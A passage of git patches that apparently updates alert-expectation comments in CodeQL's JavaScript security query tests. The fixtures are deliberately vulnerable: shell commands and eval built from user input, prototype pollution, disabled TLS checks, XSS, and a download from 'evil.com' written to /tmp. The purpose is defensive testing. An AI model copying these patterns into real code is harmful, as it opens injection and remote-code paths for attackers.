b/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar.js index 63aa2666c69d..016e89c00a9b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar.js +++ b/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar.js @@ -1 +1 @@ -window.parent.postMessage(userName, '*'); +window.parent.postMessage(userName, '*'); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar2.js b/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar2.js index 6a38d5a02a27..112f308499c3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar2.js +++ b/javascript/ql/test/query-tests/Security/CWE-201/PostMessageStar2.js @@ -10,4 +10,4 @@ window.parent.postMessage(password, '*'); // $ Alert window.parent.postMessage(data.bar, '*'); })(); -window.parent.postMessage(authKey, '*'); +window.parent.postMessage(authKey, '*'); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-295/tst2.js b/javascript/ql/test/query-tests/Security/CWE-295/tst2.js index 50f5ae277146..f36ccfbc0990 100644 --- a/javascript/ql/test/query-tests/Security/CWE-295/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-295/tst2.js @@ -5,7 +5,7 @@ let requestOptions = { "content-type": "application/json", "accept": "application/json" }, - rejectUnauthorized: false, + rejectUnauthorized: false, // $ Alert requestCert: true, agent: false } diff --git a/javascript/ql/test/query-tests/Security/CWE-312/build-leaks.js b/javascript/ql/test/query-tests/Security/CWE-312/build-leaks.js index 92ecbb49e58d..9d7648df8e33 100644 --- a/javascript/ql/test/query-tests/Security/CWE-312/build-leaks.js +++ b/javascript/ql/test/query-tests/Security/CWE-312/build-leaks.js @@ -1,9 +1,9 @@ const webpack = require("webpack"); -var plugin = new webpack.DefinePlugin({ // $ Alert +var plugin = new webpack.DefinePlugin({ "process.env": JSON.stringify(process.env) -}); +}); // $ Alert[js/build-artifact-leak] new webpack.DefinePlugin({ 'process.env': JSON.stringify({ DEBUG: process.env.DEBUG }) }) diff --git a/javascript/ql/test/query-tests/Security/CWE-754/UnvalidatedDynamicMethodCall.js b/javascript/ql/test/query-tests/Security/CWE-754/UnvalidatedDynamicMethodCall.js index b7d99c2c9eec..4c2e13deaa64 100644 --- a/javascript/ql/test/query-tests/Security/CWE-754/UnvalidatedDynamicMethodCall.js +++ b/javascript/ql/test/query-tests/Security/CWE-754/UnvalidatedDynamicMethodCall.js @@ -12,5 +12,5 @@ var actions = { app.get('/perform/:action/:payload', function(req, res) { let action = actions[req.params.action]; - res.end(action(req.params.payload)); + res.end(action(req.params.payload)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-770/MissingRateLimit/MissingRateLimiting.js b/javascript/ql/test/query-tests/Security/CWE-770/MissingRateLimit/MissingRateLimiting.js index 3fd3780bf860..8d89560e51f7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-770/MissingRateLimit/MissingRateLimiting.js +++ b/javascript/ql/test/query-tests/Security/CWE-770/MissingRateLimit/MissingRateLimiting.js @@ -5,7 +5,7 @@ app.get('/:path', function(req, res) { let path = req.params.path; if (isValidPath(path)) res.sendFile(path); -}); +}); // $ Alert function f1(req, res) { let path = req.params.path; @@ -22,4 +22,4 @@ function f3(req, res) { res.sendFile(path); } -app.get('/:path', f1, f2, f3); +app.get('/:path', f1, f2, f3); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js index 77645d0f3ac4..2a7c5d2f7b87 100644 --- a/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js +++ b/javascript/ql/test/query-tests/Security/CWE-912/HttpToFileAccess.js @@ -3,6 +3,6 @@ var fs = require("fs"); https.get('https://evil.com/script', res => { res.on("data", d => { - fs.writeFileSync("/tmp/script", d) + fs.writeFileSync("/tmp/script", d) // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js index ad420927a5c4..95bc34a79cf6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js @@ -335,7 +335,7 @@ function mergeSelective(dst, src) { if (dst[key]) { mergeSelective(dst[key], src[key]); } else { - dst[key] = src[key]; + dst[key] = src[key]; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js index 8111eb36d94a..8f6ded8b2a91 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js @@ -8,13 +8,13 @@ app.get('/hello', function(req, res) { _.merge({}, req.query); // $ MISSING: Alert _.merge({}, { - value: req.query.value // $ Alert - }); + value: req.query.value + }); // $ Alert let opts = { thing: req.query.value // wrapped and unwrapped value }; _.merge({}, { - value: opts.thing // $ Alert - }); + value: opts.thing + }); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js b/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js index ea1966d190b7..5ff77f4e77bc 100644 --- a/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js +++ b/javascript/ql/test/query-tests/Statements/DanglingElse/tst.js @@ -2,7 +2,7 @@ function bad1() { if (cond1()) if (cond2()) return 23; - else + else // $ Alert return 42; } @@ -18,7 +18,7 @@ function bad2() { if (cond1()) { if (cond2()) { return 23; - } else { + } else { // $ Alert return 42; }} } @@ -37,7 +37,7 @@ function bad3() { else if (cond2()) if (cond2()) return 42; - else + else // $ Alert return 42; } diff --git a/javascript/ql/test/query-tests/Statements/InconsistentReturn/tst.js b/javascript/ql/test/query-tests/Statements/InconsistentReturn/tst.js index 914229480a18..2b9be9c5874b 100644 --- a/javascript/ql/test/query-tests/Statements/InconsistentReturn/tst.js +++ b/javascript/ql/test/query-tests/Statements/InconsistentReturn/tst.js @@ -1,5 +1,5 @@ function f() { if (someCond()) - return; + return; // $ Alert return 42; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/LabelInCase/nonCaseLabelInSwitch.js b/javascript/ql/test/query-tests/Statements/LabelInCase/nonCaseLabelInSwitch.js index 7eb15c1006ae..a06361e01438 100644 --- a/javascript/ql/test/query-tests/Statements/LabelInCase/nonCaseLabelInSwitch.js +++ b/javascript/ql/test/query-tests/Statements/LabelInCase/nonCaseLabelInSwitch.js @@ -1,7 +1,7 @@ switch (a) { case 0: case 1: - case2: + case2: // $ Alert f(); break; default: diff --git a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.html b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.html index f039917e0c73..c01acb8a6b32 100644 --- a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.html +++ b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.html @@ -4,7 +4,7 @@ diff --git a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js index 11cc92b5b27a..f23767bfe19a 100644 --- a/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js +++ b/javascript/ql/test/query-tests/Statements/MisleadingIndentationAfterControlStmt/tst.js @@ -1,7 +1,7 @@ function bad1() { if (cond()) f(); - g(); + g(); // $ Alert } function good1() { @@ -22,7 +22,7 @@ function bad2() { f(); else g(); - h(); + h(); // $ Alert } function good3() { @@ -34,7 +34,7 @@ function good3() { function wbad1() { while (cond()) f(); - g(); + g(); // $ Alert } function wgood1() { diff --git a/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.html b/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.html index 6176fc9a39f1..7d80dd84642e 100644 --- a/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.html +++ b/javascript/ql/test/query-tests/Statements/ReturnOutsideFunction/tst.html @@ -6,7 +6,7 @@ - +
diff --git a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js index ba28c486ce31..6deedccfd340 100644 --- a/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js +++ b/javascript/ql/test/query-tests/Statements/SuspiciousUnusedLoopIterationVariable/tst.js @@ -146,4 +146,4 @@ for (const [key, key2, key3, value] of array) { } for (const [key, key2, key3, value] of array) {} // $ Alert -for (let i of [1, 2]) {} \ No newline at end of file +for (let i of [1, 2]) {} // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js b/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js index 446e51ede1e4..a0a7ddf33416 100644 --- a/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js +++ b/javascript/ql/test/query-tests/Statements/UnreachableStatement/tst.js @@ -2,7 +2,7 @@ function f() { return 23; - var a = 42; + var a = 42; // $ Alert } function g(x) { @@ -35,7 +35,7 @@ function k() { } throw new Error(); -f(); +f(); // $ Alert function l(x) { switch(x) { @@ -60,7 +60,7 @@ function m(x) { if (true) x; else - y; + y; // $ Alert function f(){ if (x) { diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js index 53496ce2e4ef..cf0c23603e2a 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/example.js @@ -5,7 +5,7 @@ function findValue(values, x, start, end) { return i; } } - if (i < end) { + if (i < end) { // $ Alert return i; } return -1; diff --git a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js index 4cc1fd775a43..58b9232cc161 100644 --- a/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js +++ b/javascript/ql/test/query-tests/Statements/UselessComparisonTest/tst.js @@ -5,6 +5,6 @@ }); (function(){ - (function (i) { if (i == 100000) return; })(1); - (function f(i) { if (i == 100000) return; f(i+1); })(1); + (function (i) { if (i == 100000) return; })(1); // $ Alert + (function f(i) { if (i == 100000) return; f(i+1); })(1); // $ Alert }); diff --git a/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js b/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js index 5741191d62d3..fef5cb07408f 100644 --- a/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js +++ b/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js @@ -1,3 +1,3 @@ { "x": 42 -} \ No newline at end of file +} // $ Alert \ No newline at end of file From 07a876b4e94fb7d820ca5061ce085674e1b7d316 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 10:20:27 +0100 Subject: [PATCH 013/115] JS: Accept some alerts at the SystemCommandExecution location --- .../CWE-078/UnsafeShellCommandConstruction/lib/lib.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index d932fbfe113e..3a5f05fac77e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js @@ -424,8 +424,8 @@ module.exports.shellOption = function (name) { spawn("rm", ["first", name], SPAWN_OPT); // $ Alert var arr = []; arr.push(name); // $ Alert - spawn("rm", arr, SPAWN_OPT); - spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // This is bad, but the alert location is down in `build`. + spawn("rm", arr, SPAWN_OPT); // $ Alert + spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // $ Alert } function build(first, last) { From f3956518072e720a25a81a8db6f9c625bd397fe0 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 11:38:03 +0100 Subject: [PATCH 014/115] JS: Mark alert as MISSING See https://github.com/github/codeql-javascript-team/issues/447 --- .../query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js index 739ec2a912be..667bbe822140 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.js @@ -30,7 +30,7 @@ app.get('/user/:id', function(req, res) { ['Name', 'Content'], ['body', req.body] ]); - res.send(mytable); // $ Alert - FIXME: only works in OLD dataflow, add implicit reads before library-contributed taint steps + res.send(mytable); // $ MISSING: Alert - the 'markdown-table' model needs to be converted to a flow summary }); var showdown = require('showdown'); From 1f3c49638bdc35d769fb88b77fe6fc29f3f2b716 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 14:12:04 +0100 Subject: [PATCH 015/115] JS: Accept some less obvious alerts These are listed in a function called 'good' but it's difficult to say in isolation whether they should be flagged or not. Accepting the changes as they seem reasonable. --- .../Security/CWE-116/IncompleteSanitization/tst.js | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js index e18b45880bd3..8b7852f68535 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js @@ -126,18 +126,18 @@ function good11(s) { return s.replace("%d", "42"); } -function good12(s) { +function goodOrBad12(s) { s.replace('[', '').replace(']', ''); s.replace('(', '').replace(')', ''); s.replace('{', '').replace('}', ''); - s.replace('<', '').replace('>', ''); // too common as a bad HTML sanitizer + s.replace('<', '').replace('>', ''); // $ Alert[js/incomplete-sanitization] - s.replace('[', '\\[').replace(']', '\\]'); - s.replace('{', '\\{').replace('}', '\\}'); + s.replace('[', '\\[').replace(']', '\\]'); // $ Alert[js/incomplete-sanitization] + s.replace('{', '\\{').replace('}', '\\}'); // $ Alert[js/incomplete-sanitization] s = s.replace('[', ''); s = s.replace(']', ''); - s.replace(/{/, '').replace(/}/, ''); // should have used a string literal if a single replacement was intended + s.replace(/{/, '').replace(/}/, ''); // $ Alert[js/incomplete-sanitization] - should have used a string literal if a single replacement was intended s.replace(']', '').replace('[', ''); // $ Alert[js/incomplete-sanitization] - probably OK, but still flagged } From 68fae9ded8b84970c2a13f74a3bdcab368dedcdf Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 14:12:38 +0100 Subject: [PATCH 016/115] JS: Accept alerts about newline replacement --- .../Security/CWE-116/IncompleteSanitization/tst.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js index 8b7852f68535..ff90b5dcd234 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js @@ -145,8 +145,8 @@ function newlines(s) { // motivation for whitelist require("child_process").execSync("which emacs").toString().replace("\n", ""); - x.replace("\n", "").replace(x, y); - x.replace(x, y).replace("\n", ""); + x.replace("\n", "").replace(x, y); // $ Alert[js/incomplete-sanitization] + x.replace(x, y).replace("\n", ""); // $ Alert[js/incomplete-sanitization] } app.get('/some/path', function(req, res) { From e5bee19b1951c6866727f9a4bd3d289d62036411 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 14:16:07 +0100 Subject: [PATCH 017/115] JS: Accept a double-flagged line This is flagged by two queries but for two separate issues. Seems valid to flag it twice. --- .../query-tests/Security/CWE-116/IncompleteSanitization/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js index ff90b5dcd234..d89b37f31d69 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst.js @@ -338,7 +338,7 @@ function typicalBadHtmlSanitizers(s) { } function bad18NewRegExp(p) { - return p.replace(new RegExp("\\.\\./"), ""); + return p.replace(new RegExp("\\.\\./"), ""); // $ Alert[js/incomplete-sanitization] Alert[js/incomplete-multi-character-sanitization] -- both lacking global flag, and multi-char replacement problem } function bad4NewRegExpG(s) { From e026b9e04893c06e448d49e86eb33f94aa7abd21 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 10:12:16 +0100 Subject: [PATCH 018/115] JS: Mark regressions due to lack of local field steps --- .../UnsafeShellCommandConstruction/lib/lib.js | 4 ++-- .../CWE-079/UnsafeHtmlConstruction/main.js | 2 +- .../CWE-094/CodeInjection/lib/index.js | 18 +++++++++--------- .../PrototypePollutingAssignment/lib.js | 2 +- 4 files changed, 13 insertions(+), 13 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index 3a5f05fac77e..b6efdbd131a6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js @@ -363,8 +363,8 @@ function MyTrainer(opts) { MyTrainer.prototype = { train: function() { - var command = "learn " + this.learn_args + " " + model; // $ Alert - cp.exec(command); + var command = "learn " + this.learn_args + " " + model; // $ MISSING: Alert - lack of local field step + cp.exec(command); } }; module.exports.MyTrainer = MyTrainer; diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js index 369643121368..061a82c862d7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js @@ -44,7 +44,7 @@ class Foo { doXss() { // not called here, but still bad. - document.querySelector("#class").innerHTML = "" + this.step + ""; // $ Alert + document.querySelector("#class").innerHTML = "" + this.step + ""; // $ MISSING: Alert - needs localFieldStep } } diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js index 950d34ff981f..600059382d9d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js @@ -48,7 +48,7 @@ export function Template(text, opts) { Template.prototype = { compile: function () { var opts = this.opts; - eval(" var " + opts.varName + " = something();"); // $ Alert + eval(" var " + opts.varName + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep }, // The below are justs tests that ensure the global-access-path computations terminate. pathsTerminate1: function (node, prev) { @@ -100,10 +100,10 @@ export class AccessPathClass { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // $ Alert - eval(" var " + this.options2.taintedOption + " = something();"); // $ Alert - eval(" var " + this.options3.taintedOption + " = something();"); // $ Alert - eval(" var " + this.taint + " = something();"); // $ Alert + eval(" var " + this.options1.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options2.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options3.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.taint + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep } } @@ -132,10 +132,10 @@ export class AccessPathClassBB { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // $ Alert - eval(" var " + this.options2.taintedOption + " = something();"); // $ Alert - eval(" var " + this.options3.taintedOption + " = something();"); // $ Alert - eval(" var " + this.taint + " = something();"); // $ Alert + eval(" var " + this.options1.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options2.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.options3.taintedOption + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep + eval(" var " + this.taint + " = something();"); // $ MISSING: Alert - due to lack of localFieldStep } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js index 6acf7ef2df10..79b34df3f7b5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/lib.js @@ -67,7 +67,7 @@ class Foo { const obj = this.obj; const path = this.path; const value = this.value; - return (obj[path[0]][path[1]] = value); // $ Alert + return (obj[path[0]][path[1]] = value); // $ MISSING: Alert - lacking local field step } safe() { From 2c46e106787f570188d38046431321b1e6f9ff06 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 15:23:37 +0100 Subject: [PATCH 019/115] JS: Mark an alert as missing --- .../test/query-tests/Security/CWE-200/private-file-exposure.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js b/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js index c3aaec3926ff..ba532d6b42e2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js +++ b/javascript/ql/test/query-tests/Security/CWE-200/private-file-exposure.js @@ -61,7 +61,7 @@ function good() { app.use("bootstrap", express.static('./node_modules/bootstrap/dist')); } -app.use(express.static(__dirname)) // $ Alert +app.use(express.static(__dirname)) // $ MISSING: Alert const serveHandler = require("serve-handler"); const http = require("http"); From 426a871405c82a1edbf9d51fb5a0b70fb97c2cd7 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 15:11:58 +0100 Subject: [PATCH 020/115] JS: Remove incorrect Alert marker This is expected, based on a comment earlier in the file about the 'y' variable --- .../ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js index 1e53a3a4a0f0..29eb66403511 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js @@ -3,6 +3,6 @@ /*global: z*/ // also not a proper global declaration w; x; -y; // $ Alert +y; z; // $ Alert var x, y, z; \ No newline at end of file From 287753187eadb95ca9047e4641ab33562f42f699 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 15:24:16 +0100 Subject: [PATCH 021/115] JS: Remove invalid syntax from test TS decorators may not appear on functions and enums --- .../UnusedVariable/UnusedVariable.expected | 2 -- .../Declarations/UnusedVariable/decorated.ts | 12 +++--------- 2 files changed, 3 insertions(+), 11 deletions(-) diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected index 52ffe782fa2b..6b77c8021fbc 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected @@ -1,7 +1,5 @@ #select | Babelrc/importPragma.jsx:2:1:2:27 | import ... react'; | Unused import q. | -| decorated.ts:1:1:1:126 | import ... where'; | Unused import actionHandler. | -| decorated.ts:4:10:4:12 | fun | Unused function fun. | | eval.js:10:9:10:24 | not_used_by_eval | Unused variable not_used_by_eval. | | eval.js:19:9:19:24 | not_used_by_eval | Unused variable not_used_by_eval. | | externs.js:5:5:5:13 | iAmUnused | Unused variable iAmUnused. | diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/decorated.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/decorated.ts index 858f69ffd5b1..39a06d5eb293 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/decorated.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/decorated.ts @@ -1,13 +1,7 @@ -import {actionHandler, actionHandlerFactory, actionHandlerFactoryProvider, actionHandlerFactoryProviderKind} from 'somewhere'; // OK - imports used as decorators - -@actionHandler -function fun() {} // OK - decorator might use the function +import { actionHandlerFactory, actionHandlerFactoryProvider } from 'somewhere'; // OK - imports used as decorators @actionHandlerFactory -class Class {} // OK - decorator might use the class +class Class { } // OK - decorator might use the class @actionHandlerFactoryProvider -export class ExportedClass {} // OK - decorator might use the class - -@actionHandlerFactoryProviderKind -enum Enum { plain } // OK - decorator might use the enum +export class ExportedClass { } // OK - decorator might use the class From a9b263f465d50279805ff6a8d5df7494ea0da543 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 16:01:58 +0100 Subject: [PATCH 022/115] JS: Remove incorrect alert expectation This is not flagged and AFAICT it shouldn't be --- .../Expressions/UnknownDirective/UnknownDirective.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js index f958714431d6..e86b7b9d95bc 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js @@ -1,5 +1,5 @@ "use foo"; // $ Alert -"use strict"; // $ Alert +"use strict"; function bad() { "'use strict'"; // $ Alert From 22c218d66586d01b07a03b6934c26d4a9ee3b702 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 11 Feb 2025 16:20:39 +0100 Subject: [PATCH 023/115] JS: Mark a 'good' test as 'bad' and add Alert marker The lack of whitespace around '&&' is problematic --- .../Expressions/WhitespaceContradictsPrecedence/tst.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js index a18728b19dc0..30b75270f946 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js @@ -38,8 +38,8 @@ function ok9(x, y, z) { return x * y*z; } -function ok10(o, p) { - return p in o&&o[p]; +function bad10(o, p) { + return p in o&&o[p]; // $ Alert } From b095fe2a19875508583ee2229e6ec72efd07c649 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 09:51:03 +0100 Subject: [PATCH 024/115] JS: Fix some bugs in a test case 'args' was a redeclared block-level variable, and 'myArgs' was not used when clearly intended to be used --- .../CWE-078/CommandInjection/child_process-test.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js index d84fc28af7b3..ed1c9041a8ea 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js @@ -43,12 +43,12 @@ var server = http.createServer(function(req, res) { args[1] = cmd; cp.execFile("/bin/bash", args); // $ Alert - let args = []; + args = []; args[0] = "-c"; args[1] = cmd; run("sh", args); - let args = []; + args = []; args[0] = `-` + "c"; args[1] = cmd; cp.execFile(`/bin` + "/bash", args); // $ Alert @@ -56,10 +56,10 @@ var server = http.createServer(function(req, res) { cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert - let myArgs = []; + let myArgs = []; myArgs.push(`-` + "c"); myArgs.push(cmd); - cp.execFile(`/bin` + "/bash", args); // $ MISSING: Alert - no support for `[].push()` for indirect arguments + cp.execFile(`/bin` + "/bash", myArgs); // $ MISSING: Alert - no support for `[].push()` for indirect arguments }); From c051b4c98d6b3af9ff084a66cc36f9d859ba2212 Mon Sep 17 00:00:00 2001 From: Asger F Date: Wed, 12 Feb 2025 11:53:06 +0100 Subject: [PATCH 025/115] JS: Add spurious alert marker --- .../ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js | 2 +- 